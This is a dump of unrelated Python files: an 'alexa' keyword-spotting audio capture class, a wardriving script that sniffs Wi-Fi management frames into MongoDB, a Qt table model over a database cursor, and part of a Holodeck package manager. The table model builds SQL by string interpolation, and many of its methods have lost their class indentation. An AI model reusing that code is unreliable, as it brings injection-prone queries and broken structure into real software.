        config = Decoder.default_config()
        config.set_string('-hmm', os.path.join(get_model_path(), 'en-us'))
        config.set_string('-dict', os.path.join(get_model_path(), 'cmudict-en-us.dict'))
        config.set_string('-logfn', '/dev/null')
        config.set_string('-keyphrase', 'alexa')
        logging.info("Voice threshold is " + str(threshold))
        config.set_float('-kws_threshold', threshold)
        self.decoder = Decoder(config)
        self.decoder.start_utt()
        self.capture_in_progress = False
        self.buffer = None  # last completed phrase (PCM bytes), if any
        self.notify = True
        self.pt = threading.Thread(target=self.processAudio)
        self.pt.start()
    def _beep(self, length_ms = 150, frequency = 1000.0, framerate = 16000, amplitude = 0.2):
        """Synthesize a sine-wave beep and return it as 16-bit PCM bytes."""
        period = int(framerate / frequency)
        snd = bytes()
        for i in range(0, int(framerate * length_ms / 1000)):
            val = 32767.0 * amplitude * math.sin(2.0 * math.pi * float(i % period) / period)
            snd += struct.pack('<h', int(val))
        return snd
    def beep_finished(self):
        """Play the "capture finished" beep and flush the device."""
        self.play(self.beep_finished_buf)
        self.ad.flush()
    def beep_short(self):
        """Play the short "capture started" beep and flush the device."""
        self.play(self.beep_short_buf)
        self.ad.flush()
    def beep_failed(self):
        """Play the low "capture failed" beep and flush the device."""
        self.play(self.beep_failed_buf)
        self.ad.flush()
    def start_capture(self, notify = True):
        """Begin recording a phrase; when *notify* is True the callback is
        invoked once the phrase completes."""
        self.beep_short()
        self.capture_in_progress = True
        self.detect_buffer = bytes()
        self.detect_buffer_max = 0  # loudest level seen during this capture
        self.notify = notify
    def processAudio(self):
        """Background loop: read audio, spot the keyword, capture phrases.

        Ends a capture when it exceeds DETECT_MAX_LENGTH_S or when, after
        DETECT_MIN_LENGTH_S, the level drops back toward the noise average.
        """
        logging.info("Audio Processing started.")
        while self.is_run:
            buf = self.ad.read(16000)
            if buf is None:
                logging.info("Alexa audio processing exit")
                break
            if self.skip > 0:
                # discard audio corresponding to our own playback
                self.skip -= len(buf)
                continue
            # mean absolute amplitude of the buffer
            level = 0
            for i in range(0, len(buf), 2):
                val = struct.unpack_from('<h', buf, i)[0] # 16 bit little endian
                level += abs(val)
            level = level / (len(buf) / 2)
            if self.capture_in_progress:
                self.detect_buffer += buf
                if level > self.detect_buffer_max:
                    self.detect_buffer_max = level
                duration = len(self.detect_buffer)/16000/2
                if duration >= DETECT_MAX_LENGTH_S or (
                        duration >= DETECT_MIN_LENGTH_S and
                        level < self.average * DETECT_HYSTERESIS):
                    self.capture_in_progress = False
                    if self.detect_buffer_max > self.average * DETECT_HYSTERESIS:
                        logging.info("Finished " + str(duration) + "s")
                        self.buffer = self.detect_buffer
                        if self.notify:
                            threading.Thread(target=self.callback).start()
                        self.skip += 16000
                        #self.play(self.detect_buffer)
                    else:
                        # never rose above background noise: discard
                        logging.info("Cancel " + str(duration) + "s due to the low level ")
                        #self.beep_failed()
            else:
                self.decoder.process_raw(buf, False, False)
                if self.decoder.hyp() != None and self.init_counter > DETECT_BUFFERS_FOR_INIT:
                    self.start_capture()
                    self.detect_buffer += buf
                    logging.info("Found Alexa keyword")
                    # restart the utterance for the next keyword search
                    self.decoder.end_utt()
                    self.decoder.start_utt()
                else:
                    if self.init_counter <= DETECT_BUFFERS_FOR_INIT:
                        if self.init_counter == DETECT_BUFFERS_FOR_INIT:
                            logging.info("Alexa is initialized and started.")
                        self.init_counter += 1
                    # exponential moving average of background noise
                    self.average = self.average * 0.75 + level * 0.25
        logging.info("Audio Processing finished.")
    def close(self):
        """Stop the processing thread and close the audio device."""
        self.is_run = False
        self.pt.join()
        self.ad.close()
    def get_audio(self, timeout = None):
        """Return the captured phrase as PCM bytes, or None.

        With a *timeout* (seconds), starts a silent capture and waits up to
        that long; on timeout returns whatever was loud enough, else None.
        """
        if timeout is not None:
            self.start_capture(False)
            for i in range(int(timeout)):
                if(self.buffer is not None):
                    break
                time.sleep(1)
            if self.buffer is None:
                if self.detect_buffer_max > self.average * DETECT_HYSTERESIS:
                    res = self.detect_buffer
                    self.capture_in_progress = False
                    logging.info('Timeout exceed, phrase might not be completed')
                    self.beep_finished()
                    return res
                else:
                    logging.info('Timeout exceed, but nothing was detected')
                    self.beep_failed()
                    return None
        res = self.buffer
        self.buffer = None  # consume the phrase
        if res is not None:
            self.beep_finished()
        return res
    def play(self, audio):
        """Play raw PCM *audio*, skipping the echo on the input side."""
        self.skip += len(audio)
        self.ad.write(audio)
    def play_mp3(self, raw_audio):
        """Decode *raw_audio* (mp3 bytes) to 16 kHz mono PCM via ffmpeg and
        play it."""
        p = Popen(['ffmpeg', '-i', '-', '-ac', '1', '-acodec',
                   'pcm_s16le', '-ar', '16000', '-f', 's16le', '-'],
                  stdout=PIPE, stdin=PIPE, stderr=PIPE)
        pcm = p.communicate(input=raw_audio)[0]
        self.play(pcm)
|
wardriver.py | """
wardriver.py - Collects 802.11 Management Frame Tags/Parameters for analysis
Author: Axel Persinger
License: MIT License
"""
"""
Imported Libraries
argparse - Argument parser
pymongo - MongoDB library
threading - Threading library for console output
time - Sleep
tabulate - Pretty output tables
scapy - Python Networking library for sniffing
"""
import argparse
import pymongo
import threading
import time
import tabulate
import scapy.layers
import scapy.layers.dot11
import scapy.sendrecv
import scapy.utils
"""
Global Variables
_client - MongoDB Client
_stats - Packet capture statistics
"""
_client = None
_stats = {}
def console():
    """
    Outputs statistics of captured packets.

    Runs forever (intended for a background thread): every 3 seconds clears
    the terminal and prints the per-session counts from ``_stats`` plus the
    all-time counts aggregated from MongoDB via ``_client``.
    """
    while True:
        # Clear the screen (ANSI reset + clear scrollback)
        print("\033c\033[3J", end='')
        # Aggregate results from DB: count of records per 802.11 tag ID
        results = _client.MFDoom.WarDriver.aggregate([
            {"$group": {"_id": "$TagID", "count": {"$sum": 1}}},
            { "$sort": { "count": -1 } }
        ])
        # Print current session results
        print("Session Results:")
        print(tabulate.tabulate(sorted(_stats.items(), key=lambda x: x[1]), headers=["ID", "Count"]))
        print()
        # Print global results
        print("All Results:")
        print(tabulate.tabulate(sorted([(i['_id'], i['count']) for i in results], key=lambda x: x[1]), headers=["ID", "Count"]))
        time.sleep(3)
def log_layers(pkt: scapy.packet.Packet):
    """
    Logs the various 802.11 Tag Layers in the packet: bumps the in-memory
    session counter and inserts one MongoDB document per Dot11Elt layer.

    :param pkt: Packet that was sniffed
    :type pkt: scapy.packet.Packet
    """
    global _stats
    dot11elt = pkt.getlayer(scapy.layers.dot11.Dot11Elt)
    # walk the chain of information-element layers
    while dot11elt:
        # print('ID:', dot11elt.ID, 'INFO:', dot11elt.info)
        # Update session statistics
        if str(dot11elt.ID) in _stats:
            _stats[str(dot11elt.ID)] += 1
        else:
            _stats[str(dot11elt.ID)] = 1
        # Update DB
        _client.MFDoom.WarDriver.insert_one({
            'TagID': dot11elt.ID,
            'TagInfo': dot11elt.info
        })
        # Get next layer
        dot11elt = dot11elt.payload.getlayer(scapy.layers.dot11.Dot11Elt)
def main():
    """Parse CLI arguments, connect to MongoDB, start the stats console,
    and sniff 802.11 frames carrying information elements."""
    global _client
    parser = argparse.ArgumentParser()
    parser.add_argument('-i', '--iface', type=str, required=True, action='store', help="Interface to send/receive on")
    parser.add_argument('-d', '--db', type=str, required=True, action='store', help="Database connection string for MongoDB instance")
    args = parser.parse_args()
    # Connect to the DB
    _client = pymongo.MongoClient(args.db)
    # Start the console-logger.  BUG FIX: console() loops forever, so it must
    # be a daemon thread or the process can never exit after sniffing stops.
    threading.Thread(target=console, daemon=True).start()
    # Sniff the packets
    scapy.sendrecv.sniff(
        iface=args.iface,
        lfilter=lambda pkt: pkt.haslayer(scapy.layers.dot11.Dot11Elt),
        prn=log_layers,
    )


if __name__ == '__main__':
    main()
CursorTableModel.py | # # -*- coding: utf-8 -*-
import math, random
from pineboolib.flcontrols import ProjectClass
from pineboolib import decorators
from pineboolib.qsaglobals import ustr
import pineboolib
from PyQt4 import QtCore
from pineboolib.fllegacy.FLSqlQuery import FLSqlQuery
from pineboolib.fllegacy.FLFieldMetaData import FLFieldMetaData
from pineboolib.fllegacy.FLTableMetaData import FLTableMetaData
import traceback
import threading
import time, itertools
DEBUG = False
DisplayRole = QtCore.Qt.DisplayRole
EditRole = QtCore.Qt.EditRole
Horizontal = QtCore.Qt.Horizontal
Vertical = QtCore.Qt.Vertical
QVariant_invalid = None
QVariant = str()
QAbstractTableModel_headerData = QtCore.QAbstractTableModel.headerData
class CursorTableModel(QtCore.QAbstractTableModel):
    """Qt table model backed by a database server-side cursor, with lazy
    batched row fetching (pineboo/FL legacy)."""

    rows = 15  # default; replaced per-instance in __init__/refresh
    cols = 5  # default; replaced per-instance in __init__
    _cursor = None  # DB-API cursor, created in refresh()
    USE_THREADS = False  # enable background prefetch via threadFetch()
    USE_TIMER = False  # enable periodic updateRows() via QTimer
    CURSOR_COUNT = itertools.count()  # class-wide counter for unique cursor names
    def __init__(self, action,project, *args):
        """Build the model for *action*'s table within *project*.

        :param action: project action describing which table to show
        :param project: pineboo project (provides connection and metadata)
        :raises AssertionError: if the action has no associated table
        """
        super(CursorTableModel,self).__init__(*args)
        from pineboolib.qsaglobals import aqtt
        self._action = action
        self._prj = project
        if action and action.table:
            self._table = project.tables[action.table]
            self._metadata = project.conn.manager().metadata(self._table.name)
        else:
            raise AssertionError
        self.sql_fields = []
        self.field_aliases = []
        self.field_type = []
        self.field_metaData = []
        # Lookup indexes keyed by PK and CK.  The "pos" arrays hold the
        # positions of the affected columns; PK will normally be [0,] and
        # CK may be [] or e.g. [2,3,4].  The IDX dicts map the composed key
        # value (as a tuple) to the row position.  If _data is mutated
        # (e.g. deleting intermediate rows) the indexes must be invalidated
        # and, optionally, rebuilt.
        self.pkpos = []
        self.ckpos = []
        self.pkidx = {}
        self.ckidx = {}
        self.indexes_valid = False # Set back to False whenever index contents become stale.
        #for field in self._table.fields:
            #if field.visible_grid:
                #self.sql_fields.append(field.name())
                #self.field_metaData.append(field)
                # self.tableMetadata().addField(field)
        self._data = []  # raw row tuples fetched from the cursor
        self._vdata = []  # per-row display-string cache (lazily built)
        self._column_hints = []  # width hints per column, in arbitrary units
        self.cols = len(self.tableMetadata().fieldListObject())
        self.col_aliases = [ str(self.tableMetadata().indexFieldObject(i).alias()) for i in range(self.cols) ]
        self.fetchLock = threading.Lock()
        self.rows = 0
        self.rowsLoaded = 0  # rows announced to the view so far
        self.where_filters = {}
        self.pendingRows = 0
        self.lastFetch = 0
        self.fetchedRows = 0
        self.threadFetcher = threading.Thread(target=self.threadFetch)
        self.threadFetcherStop = threading.Event()
        self.timer = QtCore.QTimer()
        self.timer.timeout.connect(self.updateRows)
        self.canFetchMore = True  # NOTE: shadows the method of the same name
        if self.USE_TIMER == True:
            self.timer.start(1000)
        self.refresh()
def metadata(self):
#print("CursorTableModel: METADATA: " + self._table.name)
return self._metadata
def canFetchMore(self,index):
return self.canFetchMore
ret = self.rows > self.rowsLoaded
#print("canFetchMore: %r" % ret)
return ret
    def data(self, index, role):
        """Qt hook: return the display/edit value for a cell.

        Display strings for a whole row are built lazily and cached in
        ``self._vdata`` the first time any cell of the row is requested.
        """
        row = index.row()
        col = index.column()
        if role == DisplayRole or role == EditRole:
            r = self._vdata[row]
            if r is None:
                # first access to this row: stringify and cache it
                r = [ str(x) for x in self._data[row] ]
                self._vdata[row] = r
            d = r[col]
            #if row > self.rowsLoaded *0.95 - 200 and time.time() - self.lastFetch> 0.3: self.fetchMore(QtCore.QModelIndex())
            #d = self._vdata[row*1000+col]
            #if type(d) is str:
            #    d = QVariant(d)
            #    self._vdata[row*1000+col] = d
            return d
        return QVariant_invalid
    def threadFetch(self):
        """Background worker: FETCH the next 2000 rows from the named
        server-side cursor (results are collected later via fetchall())."""
        #ct = threading.current_thread()
        #print("Thread: FETCH (INIT)")
        tiempo_inicial = time.time()
        sql = """FETCH %d FROM %s""" % (2000,self._curname)
        self._cursor.execute(sql)
        tiempo_final = time.time()
        if DEBUG:
            # log only slow fetches
            if tiempo_final - tiempo_inicial > 0.2:
                print("Thread: ", sql, "time: %.3fs" % (tiempo_final - tiempo_inicial))
    def updateRows(self):
        """Timer slot: announce already-fetched rows to the view in batches,
        keeping a safety margin while the fetcher thread is still running."""
        ROW_BATCH_COUNT = 200 if self.threadFetcher.is_alive() else 0
        parent = QtCore.QModelIndex()
        fromrow = self.rowsLoaded
        torow = self.fetchedRows - ROW_BATCH_COUNT - 1
        if torow - fromrow < 10: return  # not worth announcing tiny batches
        if DEBUG: print("Updaterows %s (UPDATE:%d)" % (self._table.name, torow - fromrow +1) )
        self.beginInsertRows(parent, fromrow, torow)
        self.rowsLoaded = torow + 1
        self.endInsertRows()
        #print("fin refresco modelo tabla %r , query %r, rows: %d %r" % (self._table.name, self._table.query_table, self.rows, (fromrow,torow)))
        topLeft = self.index(fromrow,0)
        bottomRight = self.index(torow,self.cols-1)
        self.dataChanged.emit(topLeft,bottomRight)
    def fetchMore(self,index):
        """Qt hook: pull the next batch of rows from the server cursor into
        the model, update column width hints on the first batch, and kick
        off the background prefetch thread."""
        tiempo_inicial = time.time()
        #ROW_BATCH_COUNT = min(200 + self.rowsLoaded // 10, 1000)
        ROW_BATCH_COUNT = 1000
        parent = index
        fromrow = self.rowsLoaded
        torow = self.rowsLoaded + ROW_BATCH_COUNT # FIXME: rows that never get loaded should be dropped at the end...
        if self.fetchedRows - ROW_BATCH_COUNT - 1 > torow:
            torow = self.fetchedRows - ROW_BATCH_COUNT - 1
        #print("refrescando modelo tabla %r , query %r, rows: %d %r" % (self._table.name, self._table.query_table, self.rows, (fromrow,torow)))
        if torow < fromrow: return
        #print("QUERY:", sql)
        if self.fetchedRows <= torow and self.canFetchMore:
            # collect the rows the worker thread FETCHed, then start the next FETCH
            if self.threadFetcher.is_alive(): self.threadFetcher.join()
            c_all = self._cursor.fetchall()
            newrows = len(c_all) #self._cursor.rowcount
            from_rows = self.rows
            self._data += c_all
            self._vdata += [None] * newrows
            self.fetchedRows+=newrows
            self.rows += newrows
            self.canFetchMore = newrows > 0  # empty batch means cursor exhausted
            self.pendingRows = 0
            self.indexUpdateRowRange((from_rows,self.rows))
            self.threadFetcher = threading.Thread(target=self.threadFetch)
            self.threadFetcher.start()
        if torow > self.rows -1: torow = self.rows -1
        if torow < fromrow: return
        self.beginInsertRows(parent, fromrow, torow)
        if fromrow == 0:
            # first batch: derive column width hints from up to 200 sample rows
            data_trunc = self._data[:200]
            for row in data_trunc:
                for r, val in enumerate(row):
                    txt = str(val)
                    ltxt = len(txt)
                    newlen = int(40 + math.tanh(ltxt/3000.0) * 35000.0)
                    self._column_hints[r] += newlen
            for r in range(len(self._column_hints)):
                self._column_hints[r] /= len(self._data[:200]) + 1
            self._column_hints = [ int(x) for x in self._column_hints ]
        self.indexes_valid = True
        self.rowsLoaded = torow + 1
        self.endInsertRows()
        #print("fin refresco modelo tabla %r , query %r, rows: %d %r" % (self._table.name, self._table.query_table, self.rows, (fromrow,torow)))
        topLeft = self.index(fromrow,0)
        bottomRight = self.index(torow,self.cols-1)
        self.dataChanged.emit(topLeft,bottomRight)
        tiempo_final = time.time()
        self.lastFetch = tiempo_final
        if self.USE_THREADS == True and not self.threadFetcher.is_alive() and self.pendingRows > 0:
            self.threadFetcher = threading.Thread(target=self.threadFetch)
            self.threadFetcherStop = threading.Event()
            self.threadFetcher.start()
        if tiempo_final - tiempo_inicial > 0.2:
            # log only slow refreshes
            print("fin refresco tabla '%s' :: rows: %d %r :: (%.3fs)" % ( self._table.name, self.rows, (fromrow,torow), tiempo_final - tiempo_inicial))
def refresh(self):
    """Reload the model from the database: drop all cached rows and re-open
    a server-side cursor built from the current where_filters.

    NOTE(review): the SQL is assembled by string interpolation; filter
    values in where_filters must already be escaped by the caller.
    """
    parent = QtCore.QModelIndex()
    oldrows = self.rowsLoaded
    self.beginRemoveRows(parent, 0, oldrows)
    # Stop the background fetcher before clearing the data it writes into.
    self.threadFetcherStop.set()
    if self.threadFetcher.is_alive():
        self.threadFetcher.join()
    self.rows = 0
    self.rowsLoaded = 0
    self.fetchedRows = 0
    self.sql_fields = []
    self.pkpos = []
    self.ckpos = []
    self._data = []
    self.endRemoveRows()
    if oldrows > 0:
        self.rowsRemoved.emit(parent, 0, oldrows - 1)
    # Combine all non-empty filters with AND.
    # BUGFIX: the original compared strings with `is`, which only works by
    # accident of CPython literal interning; use equality instead.
    where_filter = " "
    for k, wfilter in sorted(self.where_filters.items()):
        if wfilter is None:
            continue
        wfilter = wfilter.strip()
        if not wfilter:
            continue
        if where_filter == " ":
            where_filter = wfilter
        else:
            where_filter += " AND " + wfilter
    if where_filter == " ":
        where_filter = "1=1"
    self._cursor = self._prj.conn.cursor()
    # FIXME: when the table is a query, a subquery would be needed here.
    # TODO: server-side cursor handles up to ~20.000 rows reasonably well.
    if self._table.query_table:
        # FIXME: queries are unsupported, so refresh is disabled for them.
        print("No hay soporte para CursorTableModel con Queries: name %r , query %r" % (self._table.name, self._table.query_table))
        return
    # Record primary/compound key positions while collecting field names.
    for n, field in enumerate(self.tableMetadata().fieldListObject()):
        if field.isPrimaryKey():
            self.pkpos.append(n)
        if field.isCompoundKey():
            self.ckpos.append(n)
        self.sql_fields.append(field.name())
    self._curname = "cur_" + self._table.name + "_%08d" % (next(self.CURSOR_COUNT))
    sql = """DECLARE %s NO SCROLL CURSOR WITH HOLD FOR SELECT %s FROM %s WHERE %s """ % (self._curname, ", ".join(self.sql_fields), self.tableMetadata().name(), where_filter)
    self._cursor.execute(sql)
    sql = """FETCH %d FROM %s""" % (1000, self._curname)
    self._cursor.execute(sql)
    self.rows = 0
    self.canFetchMore = True
    self.pendingRows = 0
    self._column_hints = [120.0] * len(self.sql_fields)
    self.fetchMore(parent)
def indexUpdateRow(self, rownum):
    """Refresh the primary-key and compound-key indexes for a single row."""
    record = self._data[rownum]
    if self.pkpos:
        self.pkidx[tuple(record[pos] for pos in self.pkpos)] = rownum
    if self.ckpos:
        self.ckidx[tuple(record[pos] for pos in self.ckpos)] = rownum
def indexUpdateRowRange(self, rowrange):
    """Refresh the PK/CK indexes for every row in [rowrange[0], rowrange[1])."""
    start, end = rowrange[0], rowrange[1]
    chunk = self._data[start:end]
    if self.pkpos:
        for offset, record in enumerate(chunk):
            self.pkidx[tuple(record[pos] for pos in self.pkpos)] = start + offset
    if self.ckpos:
        for offset, record in enumerate(chunk):
            self.ckidx[tuple(record[pos] for pos in self.ckpos)] = start + offset
def value(self, row, fieldname):
    """Return the raw value stored at (row, fieldname), or None when the
    row index is out of range.

    BUGFIX(cleanup): removed two large unreachable triple-quoted blocks of
    dead code (old fllarge/pixmap handling) that followed the return;
    behavior is unchanged.
    """
    if row < 0 or row >= self.rows:
        return None
    col = self.metadata().indexPos(fieldname)
    return self._data[row][col]
def updateValuesDB(self, pKValue, dict_update):
    """Apply dict_update to the row identified by primary key pKValue,
    persist it with UPDATE ... RETURNING, then copy back what the database
    actually stored (defaults/triggers) into the cached row.

    Raises AssertionError when the in-memory indexes do not resolve the
    primary key to a consistent row.
    """
    row = self.findPKRow([pKValue])
    if row is None:
        raise AssertionError("Los indices del CursorTableModel no devolvieron un registro (%r)" % (pKValue))
    if self.value(row, self.pK()) != pKValue:
        raise AssertionError("Los indices del CursorTableModel devolvieron un registro erroneo: %r != %r" % (self.value(row, self.pK()), pKValue))
    self.setValuesDict(row, dict_update)
    pkey_name = self.tableMetadata().primaryKey()
    # TODO: mogrify's bytes-to-str conversion may mangle accented characters.
    typePK_ = self.tableMetadata().field(self.tableMetadata().primaryKey()).type()
    # formatValue() quotes/escapes the PK literal according to its type.
    pKValue = self._prj.conn.manager().formatValue(typePK_, pKValue, False)
    where_filter = "%s = %s" % (pkey_name, pKValue)
    print("pkvalue = %r" % pKValue)
    update_set = []
    for key, value in dict_update.items():
        type_ = self.tableMetadata().field(key).type()
        # Each value is escaped the same way as the PK above.
        value = self._prj.conn.manager().formatValue(type_, value, False)
        update_set.append("%s = %s" % (key, value))
        print("field %r = %r" % (key, value))
    update_set_txt = ", ".join(update_set)
    # NOTE(review): SQL is built by string interpolation; injection safety
    # relies entirely on formatValue() escaping correctly.
    sql = """UPDATE %s SET %s WHERE %s RETURNING *""" % (self.tableMetadata().name(), update_set_txt, where_filter)
    print("MODIFYING SQL :: ", sql)
    self._cursor.execute(sql)
    returning_fields = [x[0] for x in self._cursor.description]
    # Sync the model row with the values the database actually stored.
    for orow in self._cursor:
        dict_update = dict(zip(returning_fields, orow))
        self.setValuesDict(row, dict_update)
"""
Asigna un valor una fila usando un diccionario
@param row. Columna afectada
@param update_dict. array clave-valor indicando el listado de claves y valores a actualizar
"""
@decorators.BetaImplementation
def setValuesDict(self, row, update_dict):
    """Update a row in memory from a {fieldname: value} dict.

    Keeps both the raw store (_data) and the display store (_vdata) in
    sync and refreshes the PK/CK indexes for the row. Unknown field names
    are reported but do not abort the update.
    """
    if DEBUG: print("CursorTableModel.setValuesDict(row %s) = %r" % (row, update_dict))
    try:
        # Rows fetched from the DB arrive as tuples; make this one mutable.
        if isinstance(self._data[row], tuple):
            self._data[row] = list(self._data[row])
        r = self._vdata[row]
        if r is None:
            # Display cache not built for this row yet; seed it from _data.
            r = [str(x) for x in self._data[row]]
            self._vdata[row] = r
        colsnotfound = []
        for fieldname, value in update_dict.items():
            try:
                col = self.sql_fields.index(fieldname)
                self._data[row][col] = value
                r[col] = value
            except ValueError:
                colsnotfound.append(fieldname)
        if colsnotfound:
            print("CursorTableModel.setValuesDict:: columns not found: %r" % (colsnotfound))
        self.indexUpdateRow(row)
    except Exception:
        print("CursorTableModel.setValuesDict(row %s) = %r :: ERROR:" % (row, update_dict), traceback.format_exc())
"""
Asigna un valor una celda
@param row. Columna afectada
@param fieldname. Nonbre de la fila afectada. Se puede obtener la columna con self.metadata().indexPos(fieldname)
@param value. Valor a asignar. Puede ser texto, pixmap, etc...
"""
def setValue(self, row, fieldname, value):
    """Set a single cell by delegating to the generic setValuesDict().

    BUGFIX: the original called self.setValuesDict(self, row, {...}),
    passing `self` twice, which raised TypeError on every invocation.
    """
    self.setValuesDict(row, {fieldname: value})
"""
Dibuja el valor correcto
"""
def paintCell(self, format_, value):
    """Return the display value for a cell wrapped in a QVariant."""
    # Debug trace left in by the original author.
    print("Dibujando formato", format_)
    # NOTE(review): relies on module-level `ustr` and `QtCore` being in scope.
    return QtCore.QVariant(ustr(value))
"""
Crea una nueva linea en el tableModel
@param buffer . PNBuffer a aรฑadir
"""
@decorators.NotImplementedWarn
def newRowFromBuffer(self, buffer):
    """Append a new row to the model from a PNBuffer.

    NOTE(review): the bare `return` below disables the whole body, matching
    the NotImplementedWarn decorator. The dead code after it also computes
    newRow = self.rowCount() AFTER appending to _data, so if re-enabled
    as-is the indexing would need to be re-checked.
    """
    try:
        if DEBUG: print("CursorTableModel.newRowFromBuffer")
        return
        colsnotfound = []
        self._data.append([])
        self._vdata.append([])
        newRow = self.rowCount()
        for fieldBuffer in buffer.fieldsList():
            try:
                self._data[newRow].append(fieldBuffer.value)
                self._vdata[newRow].append(fieldBuffer.value)
            except ValueError:
                colsnotfound.append(fieldBuffer.name)
        if colsnotfound:
            print("CursorTableModel.newRowFromBuffer:: columns not found: %r" % (colsnotfound))
        self.indexUpdateRow(newRow)
    except Exception:
        print("CursorTableModel.newRowFromBuffer(row %s) :: ERROR:" % newRow, traceback.format_exc())
def findPKRow(self, pklist):
    """Return the row number whose primary key matches pklist, or None."""
    if not isinstance(pklist, (tuple, list)):
        raise ValueError("findPKRow expects a list as first argument. Enclose PK inside brackets [self.pkvalue]")
    if not self.indexes_valid:
        # Lazily rebuild the whole index before the first lookup.
        for rownum in range(self.rows):
            self.indexUpdateRow(rownum)
        self.indexes_valid = True
    key = tuple(pklist)
    try:
        return self.pkidx[key]
    except KeyError:
        print("CursorTableModel.findPKRow:: PK not found: %r (requires list, not integer or string)" % key)
        return None
def findCKRow(self, cklist):
    """Return the row number whose compound key matches cklist, or None."""
    if not isinstance(cklist, (tuple, list)):
        raise ValueError("findCKRow expects a list as first argument.")
    if not self.indexes_valid:
        # Lazily rebuild the whole index before the first lookup.
        for rownum in range(self.rows):
            self.indexUpdateRow(rownum)
        self.indexes_valid = True
    key = tuple(cklist)
    try:
        return self.ckidx[key]
    except KeyError:
        print("CursorTableModel.findCKRow:: CK not found: %r (requires list, not integer or string)" % key)
        return None
def pK(self):
    """Return the name of this table's primary-key field."""
    return self.tableMetadata().primaryKey()
def fieldType(self, fieldName):
    """Return the type of the given field, or None when it does not exist."""
    field = self.tableMetadata().field(fieldName)
    return field.type() if field else None
def alias(self, fieldName):
    """Return the alias (display name) of the given field."""
    field = self.tableMetadata().field(fieldName)
    return field.alias()
def columnCount(self, parent=None):
    """Return the number of columns in the model.

    BUGFIX(cleanup): everything after the original first `return` was
    unreachable dead code (parent handling and a debug print) and has been
    removed; behavior is unchanged.
    """
    return self.cols
def rowCount(self, parent=None):
    """Return the number of rows currently loaded into the model.

    BUGFIX(cleanup): everything after the original first `return` was
    unreachable dead code and has been removed; behavior is unchanged.
    """
    return self.rowsLoaded
def headerData(self, section, orientation, role):
    """Qt header data: column aliases horizontally, 1-based row numbers
    vertically; anything else falls through to the base implementation.

    NOTE(review): DisplayRole, Horizontal, Vertical, QVariant_invalid and
    QAbstractTableModel_headerData are module-level aliases defined
    elsewhere in this file — confirm they are in scope.
    """
    if role == DisplayRole:
        if orientation == Horizontal:
            return self.col_aliases[section]
        elif orientation == Vertical:
            # Row headers are 1-based for display.
            return section + 1
        return QVariant_invalid
    return QAbstractTableModel_headerData(self, section, orientation, role)
def fieldMetadata(self, fieldName):
    """Return the metadata object for the given field name."""
    metadata = self.tableMetadata()
    return metadata.field(fieldName)
def tableMetadata(self):
    """Return this table's metadata from the connection manager."""
    manager = self._prj.conn.manager()
    return manager.metadata(self._table.name)
|
packagemanager.py | """Package manager for worlds available to download and use for Holodeck"""
import json
import os
import shutil
import sys
import tempfile
import urllib.request
import urllib.error
import fnmatch
import zipfile
import pprint
from queue import Queue
from threading import Thread
from holodeck import util
from holodeck.exceptions import HolodeckException, NotFoundException
BACKEND_URL = "https://s3.amazonaws.com/holodeckworlds/"
def _get_from_backend(rel_url):
    """
    Gets the resource given at rel_url, assumes it is a utf-8 text file

    Args:
        rel_url (:obj:`str`): url relative to BACKEND_URL to fetch

    Returns:
        :obj:`str`: The resource at rel_url as a string
    """
    response = urllib.request.urlopen(BACKEND_URL + rel_url)
    return response.read().decode('utf-8')
def available_packages():
    """Returns a list of package names available for the current version of Holodeck

    Returns (:obj:`list` of :obj:`str`):
        List of package names
    """
    # Get the index json file from the backend
    url = "packages/{ver}/available".format(ver=util.get_holodeck_version())
    try:
        index = json.loads(_get_from_backend(url))
    except urllib.error.URLError as err:
        print("Unable to communicate with backend ({}), {}".format(
            url, err.reason),
            file=sys.stderr)
        raise
    return index["packages"]
def installed_packages():
    """Returns a list of all installed packages

    Returns:
        :obj:`list` of :obj:`str`: List of all the currently installed packages
    """
    _check_for_old_versions()
    names = []
    for config, _ in _iter_packages():
        names.append(config["name"])
    return names
def package_info(pkg_name):
    """Prints the information of a package.

    Args:
        pkg_name (:obj:`str`): The name of the desired package to get information
    """
    indent = " "
    for config, _ in _iter_packages():
        if config["name"] != pkg_name:
            continue
        print("Package:", pkg_name)
        print(indent, "Platform:", config["platform"])
        print(indent, "Version:", config["version"])
        print(indent, "Path:", config["path"])
        print(indent, "Worlds:")
        for world in config["worlds"]:
            world_info(world["name"], world_config=world, base_indent=4)
def _print_agent_info(agents, base_indent=0):
print(base_indent*' ', "Agents:")
base_indent += 2
for agent in agents:
print(base_indent*' ', "Name:", agent["agent_name"])
print(base_indent*' ', "Type:", agent["agent_type"])
print(base_indent*' ', "Sensors:")
for sensor in agent["sensors"]:
print((base_indent + 2)*' ', sensor)
def world_info(world_name, world_config=None, base_indent=0):
    """Gets and prints the information of a world.

    Args:
        world_name (:obj:`str`): the name of the world to retrieve information for
        world_config (:obj:`dict`, optional): A dictionary containing the world's configuration.
            Will find the config if None. Defaults to None.
        base_indent (:obj:`int`, optional): How much to indent output
    """
    if world_config is None:
        # Scan every installed package for a matching world entry.
        for config, _ in _iter_packages():
            for world in config["worlds"]:
                if world["name"] == world_name:
                    world_config = world
    if world_config is None:
        raise HolodeckException("Couldn't find world " + world_name)
    print(base_indent * ' ', world_config["name"])
    base_indent += 4
    if "agents" in world_config:
        _print_agent_info(world_config["agents"], base_indent)
    print(base_indent * ' ', "Scenarios:")
    for scenario, _ in _iter_scenarios(world_name):
        scenario_info(scenario=scenario, base_indent=base_indent + 2)
def _find_file_in_worlds_dir(filename):
    """
    Recursively tries to find filename in the worlds directory of holodeck

    Args:
        filename (:obj:`str`): Pattern to try and match (fnmatch)

    Returns:
        :obj:`str`: The path or an empty string if the file was not found
    """
    # BUGFIX: os.walk's second positional parameter is `topdown`, not a path
    # component -- the original call walked the entire holodeck path and
    # passed "worlds" (a truthy value) as topdown. Join the path explicitly.
    worlds_dir = os.path.join(util.get_holodeck_path(), "worlds")
    for root, _, filenames in os.walk(worlds_dir):
        for match in fnmatch.filter(filenames, filename):
            return os.path.join(root, match)
    return ""
def scenario_info(scenario_name="", scenario=None, base_indent=0):
    """Gets and prints information for a particular scenario file

    Must match this format: scenario_name.json

    Args:
        scenario_name (:obj:`str`): The name of the scenario
        scenario (:obj:`dict`, optional): Loaded dictionary config
            (overrides world_name and scenario_name)
        base_indent (:obj:`int`, optional): How much to indent output by
    """
    if scenario is None:
        # Find this file in the worlds/ directory
        filename = '{}.json'.format(scenario_name)
        scenario_file = _find_file_in_worlds_dir(filename)
        if scenario_file == "":
            raise FileNotFoundError("The file {} could not be found".format(filename))
        scenario = load_scenario_file(scenario_file)
